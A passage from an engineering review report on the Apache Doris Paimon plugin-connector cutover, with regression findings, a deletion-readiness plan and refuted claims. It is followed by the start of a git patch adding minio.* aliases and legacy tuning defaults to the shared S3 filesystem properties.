`ShowPartitionsCommand.java:51-53,211,369-376,480-481,505`. +- **Description:** Cut-over paimon is `PluginDrivenExternalCatalog`, so `:479` (`instanceof PluginDrivenExternalCatalog` → `handleShowPluginDrivenTablePartitions`) always fires first; the parallel `else if instanceof PaimonExternalCatalog` (`:480-481`), its method, the gate clause, the row-width clause, and the 3 legacy imports are DEAD for cutover. Harmless at runtime but blocks deleting the 3 legacy classes (compile dependency). +- **Verifier:** Confirmed. The only `new PaimonExternalCatalog` is in `PaimonExternalCatalogFactory:42` which has **zero callers**; GSON `registerCompatibleSubtype` (`:402-411`) remaps persisted legacy names to `PluginDrivenExternalCatalog` on deserialization — closing the replay path. `handleShowPluginDrivenTablePartitions` reproduces the same 5-column rich result (D-045). Not a mislabeled live dependency → not a B8 BLOCKER. +- **Remediation:** Delete the method + instanceof gate/dispatch/row-width clauses + 3 imports together with the legacy classes; behavior-neutral. + +#### R5 — Dead legacy paimon branches in Env / ExternalCatalog / UserAuthentication / RouteResolver + +- **Severity:** MINOR · **Classification:** intentional-deviation · **Verdict:** confirmed +- **Location:** `Env.java:111-112,4917-4938`; `ExternalCatalog.java:53,956-957`; `UserAuthentication.java:32,58-59`; `ExternalMetaCacheRouteResolver.java:25,69-72`. +- **Description:** Each has a legacy paimon branch DEAD for cutover and a parallel PluginDriven branch that handles it (cut-over tables report `PLUGIN_EXTERNAL_TABLE`; catalog forces `logType=PLUGIN` and overrides `buildDbForInit`; RouteResolver falls to `ENGINE_DEFAULT`). All harmless; each is a compile dependency on a legacy class. +- **Verifier:** Confirmed at every cited file:line. `PaimonExternalCatalogFactory` has 0 consumers; no `case "paimon"` in the CatalogFactory built-in switch; GSON (`403/464/489`) remaps persisted legacy names to PluginDriven classes (replay-safe). Compile-only residuals, behavior-neutral. Classification nuance: better described as residual/dead than a true behavioral deviation (PluginDriven branches reproduce legacy exactly), but the schema lacks a "residual/dead" class so intentional-deviation is retained — labeling nuance only. +- **Remediation:** Remove these branches/imports atomically with the legacy classes in B8. + +#### R6 — `systable/PaimonSysTable` + `metacache/paimon/*` + `ExternalMetaCacheMgr.paimon()` dead-for-cutover + +- **Severity:** MINOR · **Classification:** intentional-deviation · **Verdict:** confirmed +- **Location:** `systable/PaimonSysTable.java:21-22`; `{PluginDrivenSysTable,NativeSysTable}.java` (javadoc `@link/@see`); `ExternalMetaCacheMgr.java:35,176-178,302`; `metacache/paimon/*`. +- **Description:** Cut-over surfaces sys tables via `PluginDrivenSysTable` (`PluginDrivenExternalTable.getSupportedSysTables:419`), not `PaimonSysTable`; the only refs to `PaimonSysTable` outside its tree are dangling javadoc + the legacy `PaimonExternalTable` consumer (itself a deletion target). `ExternalMetaCacheMgr.paimon()` + `metacache/paimon/*` loaders + `PaimonExternalMetaCache` registration have no consumer outside the legacy tree; cut-over paimon uses `ENGINE_DEFAULT` (PluginDriven classes don't override `getMetaCacheEngine()`). Dead-for-cutover but compile-referenced. +- **Verifier:** Confirmed. Dangling `{@link PaimonSysTable}`/`@see` (`PluginDrivenSysTable.java:27`, `NativeSysTable.java:36`) would break strict javadoc/checkstyle if the class is deleted without scrubbing. Zero runtime risk → safe B8 unit delete, not a BLOCKER. +- **Remediation:** Delete `systable/PaimonSysTable`, `metacache/paimon/*`, `PaimonExternalMetaCache`, `ExternalMetaCacheMgr.paimon()`/`ENGINE_PAIMON` as a unit, but FIRST scrub the dangling javadoc references. Confirm `ENGINE_DEFAULT` is intended steady-state (it is). + +--- + +## Legacy-diff ledger + +Consolidated view of every confirmed/partial finding by how it differs from the legacy baseline. + +| id | dim | title | severity | classification | intended? | +|----|-----|-------|----------|----------------|-----------| +| R1 (scan) | read | Uniform split weight vs proportional | MINOR | regression | No — unintended FE load-balancing drift | +| R1 (be) | read | JNI `self_split_weight` unset when 0 | NIT | regression | No — but profile-only | +| R2 (table) — see appendix | ddl | (refuted) | — | — | — | +| R1 (table) | ddl | Remote-only CREATE TABLE loses errno 1050 | MINOR | regression | No — unannounced behavior change | +| C1 (config) | config | MinIO `minio.*` unbindable | MAJOR | regression | No — port gap | +| R3 (residual) | residual | MaxCompute loses VERBOSE `backends:` block | MINOR | regression | No — source-name branch bug | +| R2 (scan) | read | EXPLAIN drops `predicatesFromPaimon:` | MINOR | missing-port | Acceptable if logged | +| C2 (config) | config | HDFS catalog-create drops xml/ipc/kerberos-alias/juicefs keys | MAJOR | missing-port | No — must port | +| C4 (config) | config | HMS socket timeout ignores fe.conf override | MINOR | missing-port | No — should thread config | +| R2 (catalog) | ddl | Paimon table-cache CacheSpec validations not ported | MINOR | missing-port | Keys now dead — warn-and-strip | +| R3 (scan) | read | CAST predicates not pushed (safer) | MINOR | intentional-deviation | Yes — improves correctness | +| R2 (be) | read | history_schema_info eager superset | NIT | intentional-deviation | Yes | +| W2 | write | INSERT rejection moved to translation | NIT | intentional-deviation | Yes | +| R1 (catalog) | ddl | CREATE DB already-exists message wording | NIT | intentional-deviation | Yes (no errno loss) | +| R3 (catalog) | ddl | listDatabaseNames swallows remote failure | MINOR | intentional-deviation | Partly — paimon-local, not a shared norm | +| R3 (table) | ddl | Auto/expression partition rejected (safer) | MINOR | intentional-deviation | Yes — safer than silent strip | +| MC1 | cache | Latest schema name-keyed (no schemaId) | MINOR | intentional-deviation | Yes — CACHE-P1 | +| MC2 | cache | Time-travel schema re-resolved per query | NIT | intentional-deviation | Yes — CACHE-P1 | +| R4 (residual) | residual | Dead ShowPartitions legacy handler | MINOR | intentional-deviation | Yes — co-delete in B8 | +| R5 (residual) | residual | Dead Env/ExternalCatalog/Auth/Route branches | MINOR | intentional-deviation | Yes — co-delete in B8 | +| R6 (residual) | residual | Dead PaimonSysTable/metacache-paimon | MINOR | intentional-deviation | Yes — co-delete in B8 | +| W1 | write | No write path (both reject) | NIT | n/a | Yes | +| R1 (residual) | residual | Legacy metastore-props still LIVE | BLOCKER | n/a | N/A — must NOT delete | +| R2 (residual) | residual | property/storage/* shared infra | BLOCKER | n/a | N/A — must NOT delete | + +--- + +## B8 deletion readiness + +From the residual dimension. Deciding evidence shown for each. + +### DEAD — safe to delete in B8 (co-delete as units; paimon-only) + +| Tree / class | Deciding evidence | Caveat | +|--------------|-------------------|--------| +| `datasource/paimon/PaimonExternalCatalog{,Factory}`, `PaimonExternalDatabase`, `PaimonExternalTable`, `PaimonHMSExternalCatalog`, `PaimonDLFExternalCatalog` | `PaimonExternalCatalogFactory` has **0 callers**; no `case "paimon"` in CatalogFactory built-in switch; GSON `registerCompatibleSubtype` (`403/464/489`) remaps persisted legacy names → PluginDriven on replay | `PaimonExternalCatalog` is **import-referenced** by 5 live metastore-props classes (constants) and by `ShowPartitionsCommand`/Env/RouteResolver dead branches — see R1; sever those imports/branches first | +| `systable/PaimonSysTable` | Cut-over uses `PluginDrivenSysTable` (`getSupportedSysTables:419`); no `new PaimonSysTable(` outside legacy tree | Scrub dangling javadoc `{@link PaimonSysTable}` (`PluginDrivenSysTable:27`) and `@see` (`NativeSysTable:36`) before delete or strict javadoc breaks | +| `metacache/paimon/*` (`PaimonExternalMetaCache`, `PaimonTableLoader`, `PaimonPartitionInfoLoader`, `PaimonLatestSnapshotProjectionLoader`), `ExternalMetaCacheMgr.paimon()` + `ENGINE_PAIMON` registration | No consumer outside legacy tree; cut-over paimon uses `ENGINE_DEFAULT` (PluginDriven classes don't override `getMetaCacheEngine()`) | Delete as a unit; verify `ENGINE_DEFAULT` is intended steady-state (it is) | +| Dead legacy branches in `ShowPartitionsCommand`, `Env.getDdl`, `ExternalCatalog.buildDbForInit`, `UserAuthentication`, `ExternalMetaCacheRouteResolver` | Cut-over tables report `PLUGIN_EXTERNAL_TABLE`/`logType=PLUGIN`; PluginDriven branches always fire first; legacy branches unreachable | Remove branches + imports atomically with the legacy classes; behavior-neutral | + +### STILL-CONSUMED — must NOT delete in B8 + +| Tree / class | Consumed by | Evidence | +|--------------|-------------|----------| +| `property/metastore/Paimon*MetaStoreProperties`, `PaimonPropertiesFactory`, `AbstractPaimonProperties` | **LIVE cut-over runtime** (paimon-specific, but on the generic bridge path) | `PluginDrivenExternalCatalog.initPreExecutionAuthenticator` → `MetastoreProperties.create` → `PaimonPropertiesFactory` → `HadoopExecutionAuthenticator` (Kerberos wiring) — R1 | +| `property/storage/{S3,OSS,COS,OBS,Minio}Properties` (+ abstract bases) | **Shared with iceberg/hive/glue/dlf** + storage-vault/load/cloud/policy/connectivity | ~26 named main-source consumers (DLFCatalog, StoragePolicy, S3StorageVault, BrokerLoadJob, S3ConnectivityTester, IcebergRestProperties, …) — R2; paimon connector references none | +| `datasource/paimon/PaimonExternalCatalog` **constants** (`PAIMON_FILESYSTEM`/`PAIMON_HMS`) | 5 live metastore-props classes (compile) | Migrate constants out into the metastore-props module **before** deleting `PaimonExternalCatalog` — R1 | + +**Bottom line:** B8 is a phased deletion. The DEAD trees are safe **after** (a) severing the 5 metastore-props imports of `PaimonExternalCatalog` (migrate constants), (b) removing the dead legacy branches in the 5 fe-core call sites, and (c) scrubbing dangling javadoc. The metastore-props and storage trees stay. + +--- + +## Coverage gaps & follow-ups + +### Uncovered surfaces (from the completeness critic) + +The six dimensions were drawn around the scan-read and DDL-create spines and left several distinct user-observable FE output paths / modalities unexercised. **All 7 were CLOSED by wave 2 (§Wave 2) — outcomes summarized there; the descriptions below are the original gap statements.** None turned out to be wrong; only cosmetic/intentional deviations were found, plus the independent re-derivation of C1/C2: + +1. **SHOW PARTITIONS live rich path (cross-dim 3+5+6).** R4 only marked the DEAD legacy `handleShowPaimonTablePartitions` removable; the LIVE branch via `hasPartitionStatsCapability()` (5-column Partition/PartitionKey/RecordCount/FileSizeInBytes/lastModified) was never verified to reproduce legacy values/NULL/ordering — and the column width changed **VARCHAR(60) → VARCHAR(300)** (`ShowPartitionsCommand:509` vs `:516`), an unclassified delta. +2. **`partitions(...)` TVF / `information_schema.PARTITIONS`.** `PartitionsTableValuedFunction` + `MetadataGenerator.dealPluginDrivenCatalog`/`partitionsMetadataResult` for plugin-driven paimon never traced (column set, partitioned-vs-unpartitioned gating, per-partition values). +3. **Statistics / ANALYZE (entirely unscoped).** Column-level `ExternalTable.getColumnStatistic` is not overridden by PluginDriven; `SUPPORTS_PARTITION_STATS` is declared but its only consumer is `hasPartitionStatsCapability` (drives no actual stats collection/CBO); ANALYZE TABLE flow for a plugin-driven external table not traced. +4. **`@branch('name')` time-travel modality (dim 1).** Read finder traced `@incr` + snapshot/timestamp travel + sys-table, but not branch (3-arg branch Identifier, independent schema/snapshots, GSON round-trip of non-transient `branchName`). +5. **MTMV-on-paimon freshness contract (dim 5 partial).** Verified only the `lastFileCreationTime()→MTMVTimestampSnapshot` field map, not the end-to-end MV staleness/refresh-trigger behavior (`getTableSnapshot` version semantics, `getPartitionType` mapping). +6. **Runtime executeAuthenticated/UGI coverage as a contract (cross-dim 1+3+6).** Config keys verified, but not that **every** remote seam is wrapped in `executeAuthenticated` (e.g. `listTableNames`/`listTables`, `listDatabases`, snapshot enumeration, sys-table `getTable`, `getTableStatistics` `rowCount→plan()`). An unwrapped remote call on kerberized HMS would fail at runtime. +7. **BE native reader correctness per storage backend (dim 1 asserted, not exercised).** FE→BE verification was field-presence/wiring only; native-vs-JNI read correctness per backend (S3/OSS/COS/OBS/MinIO/HDFS) × format (ORC/Parquet) × DV+schema-evo not exercised end-to-end. Given C1 (MinIO) and C2 (HDFS), the BE native read on those backends is exactly where the FE-config gaps would surface as read failures, and that config→BE cross-seam was not traced. + +### Prioritized fix-task list + +1. **C1 (MAJOR / BLOCKER-if-`minio.*`-used)** — Add `minio.*` aliases to `S3FileSystemProperties` + `S3FileSystemProvider.supports()` (preserve MinIO defaults: region `us-east-1`, tuning 100/10000/10000). Confirmed end-to-end by two independent waves (FE catalog-create **and** BE read both broken for `minio.*` keys). Must-fix before cutover ships. +2. **C2 (MAJOR)** — Load `hadoop.config.resources` XML into the HDFS catalog-create Configuration for filesystem/jdbc flavors (have `HdfsFileSystemProperties` expose its already-XML-loaded backend map, or mirror the HMS `loadHiveConfResources`). **Scope is the XML-resource gap only** — wave 2 refuted the kerberos-by-alias sub-claim (per-FS auth marker is not load-bearing; JVM-global `UGI.setConfiguration` governs SASL). +3. **R3 (residual, MINOR)** — Drop the `"paimon".equals` gate on `appendBackendScanRangeDetail`; emit unconditionally under VERBOSE (fixes MaxCompute regression + project-rule violation + false comment). +4. **R1 (table, MINOR)** — Add the `remoteExists && !ifNotExists` arm reporting `ERR_TABLE_EXISTS_ERROR` in the bridge createTable. +5. **C4 (MINOR)** — Thread `hive_metastore_client_timeout_second` through `ConnectorContext.getEnvironment()`. +6. **R2 (catalog, MINOR)** — Warn-and-strip the now-dead `meta.cache.paimon.table.*` keys at create. +7. **R3 (catalog, MINOR)** — Include catalog name in the `listDatabaseNames` `LOG.warn`; decide whether to keep best-effort swallow (paimon-local, not a shared norm). +8. **Coverage follow-ups — CLOSED by wave 2 (§Wave 2).** SHOW PARTITIONS live path, partitions TVF, column-stats/ANALYZE, `@branch` reads, MTMV freshness, `executeAuthenticated` completeness, and the MinIO/HDFS config→BE cross-seam were all traced. All at parity except the C1/C2 re-derivation; the only new items are cosmetic/intentional deviations (document as accepted, no code change). +9. **R1/R2 (be/scan split weight), R2 (be history dict), MC1/MC2, R2 (scan EXPLAIN)** — Document as accepted deviations in the HANDOFF; no code change required. + +--- + +## Wave 2 — coverage-gap closure & reconciliation + +The wave-1 completeness critic flagged **7 user-observable surfaces/modalities** that the 6 scan-read/DDL-create dimensions left unexercised. Wave 2 ran a second clean-room adversarial pass (7 finder lines → per-finding adversarial verifier; same zero-priors discipline; 17 agents) to close them. **Outcome: 6 surfaces are at parity (only cosmetic/intentional deviations); the config→BE line independently re-derived C1 (MinIO) and C2 (HDFS).** + +### Gap-closure scorecard + +| Gap | Surface | Outcome | New findings | +|-----|---------|---------|--------------| +| G1 | SHOW PARTITIONS live rich path | **Parity.** Critic's `VARCHAR(60)→(300)` worry **debunked** — master already used `VARCHAR(300)` for the paimon branch; the `60` is the iceberg/HMS single-column branch. 5 columns = Partition / PartitionKey / RecordCount / FileSizeInBytes / **FileCount** (not "lastModified"); value source, type, width, ordering, null/0 handling all reproduce legacy. | 1 MINOR | +| G2 | `partitions(...)` TVF / `information_schema.PARTITIONS` | **Parity (net improvement).** On master a paimon catalog hit the TVF's "not support catalog" path and emitted *nothing*; the plugin path now emits name rows (HMS single-column contract). No column dropped, no value regression. | 1 MINOR + 1 NIT | +| G3 | Statistics / ANALYZE | **Full parity, 0 findings.** Row-count byte-identical (`PaimonCatalogOps.rowCount` == legacy `fetchRowCount`); column stats `Optional.empty()` in both (neither overrides `getColumnStatistic`); ANALYZE uses the generic `ExternalAnalysisTask` in both; `SUPPORTS_PARTITION_STATS` drives only SHOW PARTITIONS (no CBO/ANALYZE path existed in legacy or was dropped). | none | +| G4 | `@branch('name')` read modality | **Parity.** Branch resolves via the 3-arg Identifier with independent schema/snapshots; scan options reset; predicate/projection apply; sys-table-vs-scan-params rejected identically. | 1 NIT | +| G5 | MTMV-on-paimon freshness contract | **Parity.** `getTableSnapshot` / `getPartitionType` / `getNewestUpdateVersionOrTime` reproduce legacy snapshot/version semantics; the two deltas are paimon-inert (a cross-connector `v>=0` guard; a dropped-table empty-pin unreachable on a real freshness decision). | 1 MINOR + 1 NIT | +| G6 | `executeAuthenticated` / UGI completeness | **No regression.** The connector wraps *every* remote seam legacy wrapped (and a few more); the seams left unwrapped — split planning, `rowCount`, snapshot/time-travel resolution, schema-evolution dict, vended-token read — are **exactly** the seams legacy also left unwrapped. (Resolves the HANDOFF "split-plan RPC outside `executeAuthenticated`" open item: pre-existing, not a regression.) | 1 NIT | +| G7 | config→BE cross-seam (MinIO / HDFS) | **Re-derived C1 + C2** — see reconciliation below. | (C1/C2, already counted) + 1 refuted | + +### New findings — all intentional-deviation, no new regressions + +| id | gap | title | severity | verdict | +|----|-----|-------|----------|---------| +| W2-G1 | SHOW PARTITIONS | null partition renders `

  • =__HIVE_DEFAULT_PARTITION__` vs legacy `__DEFAULT_PARTITION__` (deliberate, to align prune/scan `IS NULL`) | MINOR | confirmed | +| W2-G2a | partitions-TVF | TVF emits partition NAME only, discarding stats the connector already collects (matches HMS contract; master emitted nothing for paimon) | MINOR | confirmed | +| W2-G2b | partitions-TVF | unpartitioned gating keys on partition COLUMNS (HMS-style) not INSTANCES (affects MaxCompute only, not paimon) | NIT | confirmed | +| W2-G4 | @branch | sys-table+scan-params error text reads "Plugin" not "Paimon" (bridge is connector-agnostic) | NIT | confirmed | +| W2-G5a | MTMV | `getNewestUpdateVersionOrTime` adds an inert `v>=0` cross-connector guard (paimon never emits the `-1` sentinel here) | MINOR | confirmed | +| W2-G5b | MTMV | dropped-table `materializeLatest` returns a `-1` empty pin instead of throwing (unreachable on real freshness path) | NIT | confirmed | +| W2-G6 | auth/UGI | scan/stats/snapshot/vended-token reads run outside `executeAuthenticated` — pre-existing, identical to legacy | NIT | confirmed | + +### G7 reconciliation with wave-1 C1 / C2 + +**MinIO (C1).** Wave 2 independently re-derived the same end-to-end break: a `minio.*`-keyed catalog binds no fe-filesystem provider (`S3FileSystemProvider.supports()` has no `minio.*` alias; no MinIO provider is registered) → empty FE Hadoop config (catalog-create "No FileSystem for scheme s3") **and** empty BE creds (`PaimonScanPlanProvider:617-624` → no `location.AWS_*`). It also found the 2026-06-14 `applyCanonicalMinioConfig` work was **not** carried into this branch (`grep minio fe-connector-paimon` = 0). **Severity conflict (surfaced, not averaged):** wave-1's verifier rated **MAJOR** (every MinIO regression suite uses canonical `s3.*` keys, which bind and work; no test relies on `minio.*`); wave-2's verifier rated **BLOCKER** (a documented legacy config namespace is now fully broken end-to-end on both catalog-create and BE read). **Resolution:** confirmed regression on a *supported-but-untested* config → **must-fix before cutover ships**; treat as BLOCKER *iff* `minio.*` keying is supported in your deployment, else MAJOR with the trivial `s3.*` workaround. The fix is identical (add `minio.*` aliases to `S3FileSystemProvider`/`S3FileSystemProperties`, preserve MinIO defaults: region `us-east-1`, tuning 100/10000/10000). + +**HDFS (C2) — scope narrowed.** Wave 2 split C2's two sub-claims: +- **XML resources (confirmed, MAJOR):** an HDFS HA/auth topology that lives only in a `hadoop.config.resources` XML file is **not** parsed into the FE catalog-create Configuration for filesystem/jdbc flavors (`HdfsFileSystemProperties` doesn't implement `HadoopStorageProperties`; the raw passthrough copies the `hadoop.config.resources` *key* verbatim but never loads the XML contents) → nameservice unresolvable at first metadata access. Inline `dfs.*` keys still work; BE scan path unaffected. +- **Kerberos-by-alias (REFUTED):** wave-1 C2 also claimed `hdfs.authentication.*` kerberos aliases are dropped from the FE Configuration and break a strict kerberized NameNode. The aliases *are* mechanically dropped from the per-FS Configuration — **but the impact does not occur**: the authenticator's first `doAs` calls `UserGroupInformation.setConfiguration(kerberosConf)` (JVM-global), so SASL/Kerberos negotiation is gated by the global UGI security state + the doAs UGI, **not** by the per-FileSystem Configuration's `hadoop.security.authentication`. Kerberized HDFS still opens; the missing per-FS marker is cosmetic/defensive. → **C2's required remediation is just the XML-resource fix** (have `HdfsFileSystemProperties` expose its already-XML-loaded backend map to the FE Hadoop-config path); the kerberos-alias UT proposed in wave 1 would assert a non-load-bearing property. + +--- + +## Appendix: refuted findings + +| id | dim | title | why refuted | +|----|-----|-------|-------------| +| R2 (table) | ddl | DROP TABLE of non-existent table loses MySQL errno 1109 | The legacy PRODUCTION drop path was base `ExternalCatalog.dropTable`, which short-circuits on local-cache miss and throws the **identical** generic `DdlException("Failed to get table: ...")` — byte-identical to the bridge. The `ERR_UNKNOWN_TABLE` arm in `performDropTable:291` was never reached for a cache-absent table; even in the only reachable case it is swallowed by `dropTableImpl`'s `catch(Exception)` re-wrap (drops the errno). No client-observable errno-1109 ever existed to lose. | +| C3 (config) | config | No-credentials S3 forces AWS-SDK-v2 provider list into `fs.s3a.aws.credentials.provider` | Code description accurate but the load-bearing impact premise is false for this build: hadoop-aws is **3.4.2** (`fe/pom.xml:370,1286`), where S3A is migrated to AWS SDK v2 and `CredentialProviderListFactory` accepts `software.amazon.awssdk.auth.credentials.AwsCredentialsProvider` classes directly. Every emitted SDK-v2 class exposes `create()`, so they ARE consumable — no instantiation failure. The behavior is a deliberate, test-pinned unification shared with iceberg/hive. | +| HDFS-krb-alias (W2-G7) | config | Kerberos via `hdfs.authentication.*` aliases dropped from FE catalog-create Configuration | Mechanically true, but SASL negotiation is gated by JVM-global `UGI.setConfiguration(kerberosConf)` from the authenticator's first `doAs`, not the per-FS Configuration. Kerberized HDFS still opens; the missing marker is non-load-bearing. Narrows wave-1 C2 to the XML-resource gap only. | +| W (n/a) | write | (no refuted write findings) | — | From 9967846ef6458eaef52b58ca3b70c52a712f6d70 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 18 Jun 2026 23:52:28 +0800 Subject: [PATCH 100/128] =?UTF-8?q?fix:=20FIX-C1-MINIO=20=E2=80=94=20bind?= =?UTF-8?q?=20minio.*=20keyed=20catalogs=20via=20shared=20fe-filesystem=20?= =?UTF-8?q?S3?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: on the typed-storage SPI branch, a catalog keyed purely with legacy minio.* properties bound no fe-filesystem provider (S3 provider/ properties recognized no minio.* key, and there is no MinIO provider), so storage config was empty -> FE catalog-create "no file io for scheme s3" and BE got no location.AWS_*. The 2026-06-14 applyCanonicalMinioConfig work targeted the obsolete applyStorageConfig path and was never carried into this branch. Legacy MinioProperties is just "S3 with a custom endpoint": pure inherited S3A config, only the minio.* prefix, region default us-east-1, and tuning defaults 100/10000/10000 differ from S3. Solution (shared fe-filesystem-s3, no dedicated provider): - S3FileSystemProperties: append minio.* aliases at the END of each field's names() (endpoint/region/access_key/secret_key/session_token/ connection.maximum/connection.request.timeout/connection.timeout/ use_path_style). First-alias-wins keeps canonical s3.*/AWS_* outranking, so the s3.* path is byte-for-byte unchanged. - S3FileSystemProvider: add minio.access_key/endpoint/region to the detection arrays so a pure minio.* map satisfies supports(). - Preserve legacy MinIO tuning defaults (100/10000/10000) via a gated applyLegacyMinioTuningDefaults() in the post-bind normalize hook: applied only when a minio.* raw key is present and the knob is unset under any alias (raw-key presence, not value-equals-default, so explicit values win); s3.* path untouched. Region us-east-1 already preserved by the endpoint-only normalize branch. Tests (fe-filesystem-s3, 28/0/0): provider supports() for pure minio map; properties bind all aliases + honor explicit tuning; endpoint-only region default + FE fs.s3.impl/fs.s3a.* + BE AWS_*; tuning-default preservation (100/10000/10000); s3-outranks-minio precedence guard. Existing toMaps_emitS3TuningDefaultsWhenNotConfigured (s3.* -> 50/3000/1000) stays green. Docker e2e (enablePaimonTest) NOT run. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../filesystem/s3/S3FileSystemProperties.java | 63 +++- .../filesystem/s3/S3FileSystemProvider.java | 7 +- .../s3/S3FileSystemPropertiesTest.java | 95 +++++ .../s3/S3FileSystemProviderTest.java | 13 + plan-doc/designs/FIX-C1-MINIO-design.md | 350 ++++++++++++++++++ plan-doc/designs/FIX-C1-MINIO-summary.md | 57 +++ plan-doc/task-list-P6-fixes.md | 26 ++ 7 files changed, 599 insertions(+), 12 deletions(-) create mode 100644 plan-doc/designs/FIX-C1-MINIO-design.md create mode 100644 plan-doc/designs/FIX-C1-MINIO-summary.md create mode 100644 plan-doc/task-list-P6-fixes.md diff --git a/fe/fe-filesystem/fe-filesystem-s3/src/main/java/org/apache/doris/filesystem/s3/S3FileSystemProperties.java b/fe/fe-filesystem/fe-filesystem-s3/src/main/java/org/apache/doris/filesystem/s3/S3FileSystemProperties.java index ccbfdf66990c98..ac484502e173f4 100644 --- a/fe/fe-filesystem/fe-filesystem-s3/src/main/java/org/apache/doris/filesystem/s3/S3FileSystemProperties.java +++ b/fe/fe-filesystem/fe-filesystem-s3/src/main/java/org/apache/doris/filesystem/s3/S3FileSystemProperties.java @@ -69,6 +69,13 @@ public final class S3FileSystemProperties public static final String DEFAULT_CREDENTIALS_PROVIDER_TYPE = "DEFAULT"; public static final String DEFAULT_REGION = "us-east-1"; + // Legacy MinioProperties defaulted the connection tuning knobs higher than S3 (100 / 10000 / 10000 + // vs 50 / 3000 / 1000). Restored for minio.*-keyed catalogs only, to preserve pre-SPI behavior. + private static final String MINIO_KEY_PREFIX = "minio."; + private static final String MINIO_DEFAULT_MAX_CONNECTIONS = "100"; + private static final String MINIO_DEFAULT_REQUEST_TIMEOUT_MS = "10000"; + private static final String MINIO_DEFAULT_CONNECTION_TIMEOUT_MS = "10000"; + private static final Pattern[] ENDPOINT_PATTERNS = new Pattern[] { Pattern.compile( "^(?:https?://)?(?:" @@ -84,14 +91,15 @@ public final class S3FileSystemProperties @Getter @ConnectorProperty(names = {ENDPOINT, "AWS_ENDPOINT", "endpoint", "ENDPOINT", "aws.endpoint", - "glue.endpoint", "aws.glue.endpoint"}, + "glue.endpoint", "aws.glue.endpoint", "minio.endpoint"}, required = false, description = "The endpoint of S3.") private String endpoint = ""; @Getter @ConnectorProperty(names = {REGION, "AWS_REGION", "region", "REGION", "aws.region", "glue.region", - "aws.glue.region", "iceberg.rest.signing-region", "rest.signing-region", "client.region"}, + "aws.glue.region", "iceberg.rest.signing-region", "rest.signing-region", "client.region", + "minio.region"}, required = false, isRegionField = true, description = "The region of S3.") @@ -101,7 +109,7 @@ public final class S3FileSystemProperties @ConnectorProperty(names = {ACCESS_KEY, "AWS_ACCESS_KEY", "access_key", "ACCESS_KEY", "glue.access_key", "aws.glue.access-key", "client.credentials-provider.glue.access_key", "iceberg.rest.access-key-id", - "s3.access-key-id"}, + "s3.access-key-id", "minio.access_key"}, required = false, description = "The access key of S3.") private String accessKey = ""; @@ -110,7 +118,7 @@ public final class S3FileSystemProperties @ConnectorProperty(names = {SECRET_KEY, "AWS_SECRET_KEY", "secret_key", "SECRET_KEY", "glue.secret_key", "aws.glue.secret-key", "client.credentials-provider.glue.secret_key", "iceberg.rest.secret-access-key", - "s3.secret-access-key"}, + "s3.secret-access-key", "minio.secret_key"}, required = false, sensitive = true, description = "The secret key of S3.") @@ -118,7 +126,7 @@ public final class S3FileSystemProperties @Getter @ConnectorProperty(names = {SESSION_TOKEN, "AWS_TOKEN", "session_token", - "s3.session-token", "iceberg.rest.session-token"}, + "s3.session-token", "iceberg.rest.session-token", "minio.session_token"}, required = false, sensitive = true, description = "The session token of S3.") @@ -149,25 +157,27 @@ public final class S3FileSystemProperties private String rootPath = ""; @Getter - @ConnectorProperty(names = {MAX_CONNECTIONS, "AWS_MAX_CONNECTIONS"}, + @ConnectorProperty(names = {MAX_CONNECTIONS, "AWS_MAX_CONNECTIONS", "minio.connection.maximum"}, required = false, description = "The maximum number of connections to S3.") private String maxConnections = DEFAULT_MAX_CONNECTIONS; @Getter - @ConnectorProperty(names = {REQUEST_TIMEOUT_MS, "AWS_REQUEST_TIMEOUT_MS"}, + @ConnectorProperty(names = {REQUEST_TIMEOUT_MS, "AWS_REQUEST_TIMEOUT_MS", + "minio.connection.request.timeout"}, required = false, description = "The request timeout of S3 in milliseconds.") private String requestTimeoutMs = DEFAULT_REQUEST_TIMEOUT_MS; @Getter - @ConnectorProperty(names = {CONNECTION_TIMEOUT_MS, "AWS_CONNECTION_TIMEOUT_MS"}, + @ConnectorProperty(names = {CONNECTION_TIMEOUT_MS, "AWS_CONNECTION_TIMEOUT_MS", + "minio.connection.timeout"}, required = false, description = "The connection timeout of S3 in milliseconds.") private String connectionTimeoutMs = DEFAULT_CONNECTION_TIMEOUT_MS; @Getter - @ConnectorProperty(names = {USE_PATH_STYLE, "s3.path-style-access"}, + @ConnectorProperty(names = {USE_PATH_STYLE, "s3.path-style-access", "minio.use_path_style"}, required = false, description = "Whether to use path-style bucket addressing.") private String usePathStyle = "false"; @@ -363,6 +373,41 @@ private void normalizeForLegacyS3Compatibility() { if (StringUtils.containsIgnoreCase(endpoint, "glue") && StringUtils.isNotBlank(region)) { endpoint = buildS3Endpoint(region); } + applyLegacyMinioTuningDefaults(); + } + + /** + * Restores the legacy {@code MinioProperties} connection-tuning defaults (100 / 10000 / 10000) + * for catalogs keyed with {@code minio.*} properties. The typed S3 path defaults to 50 / 3000 / 1000, + * so without this a pure {@code minio.*} catalog that omits the tuning keys would silently change its + * connection-pool size and timeouts versus the pre-SPI behavior. Each knob is restored only when it + * was not supplied under any alias (so explicit values are honored), and the whole step is gated on a + * {@code minio.*} key being present so the canonical {@code s3.*} path is byte-for-byte unchanged. + */ + private void applyLegacyMinioTuningDefaults() { + boolean minioKeyed = rawProperties.entrySet().stream() + .anyMatch(e -> e.getKey().startsWith(MINIO_KEY_PREFIX) && StringUtils.isNotBlank(e.getValue())); + if (!minioKeyed) { + return; + } + if (!hasRawKey(MAX_CONNECTIONS, "AWS_MAX_CONNECTIONS", "minio.connection.maximum")) { + maxConnections = MINIO_DEFAULT_MAX_CONNECTIONS; + } + if (!hasRawKey(REQUEST_TIMEOUT_MS, "AWS_REQUEST_TIMEOUT_MS", "minio.connection.request.timeout")) { + requestTimeoutMs = MINIO_DEFAULT_REQUEST_TIMEOUT_MS; + } + if (!hasRawKey(CONNECTION_TIMEOUT_MS, "AWS_CONNECTION_TIMEOUT_MS", "minio.connection.timeout")) { + connectionTimeoutMs = MINIO_DEFAULT_CONNECTION_TIMEOUT_MS; + } + } + + private boolean hasRawKey(String... keys) { + for (String key : keys) { + if (StringUtils.isNotBlank(rawProperties.get(key))) { + return true; + } + } + return false; } private static String buildS3Endpoint(String region) { diff --git a/fe/fe-filesystem/fe-filesystem-s3/src/main/java/org/apache/doris/filesystem/s3/S3FileSystemProvider.java 